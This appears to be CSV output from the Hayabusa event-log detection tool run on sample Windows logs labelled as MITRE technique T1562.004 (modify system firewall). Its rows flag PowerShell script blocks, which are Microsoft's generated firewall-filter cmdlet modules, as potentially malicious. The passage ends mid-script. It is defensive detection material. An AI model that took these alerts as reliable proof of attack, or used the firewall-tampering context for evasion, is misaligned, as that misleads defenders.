Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.974 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 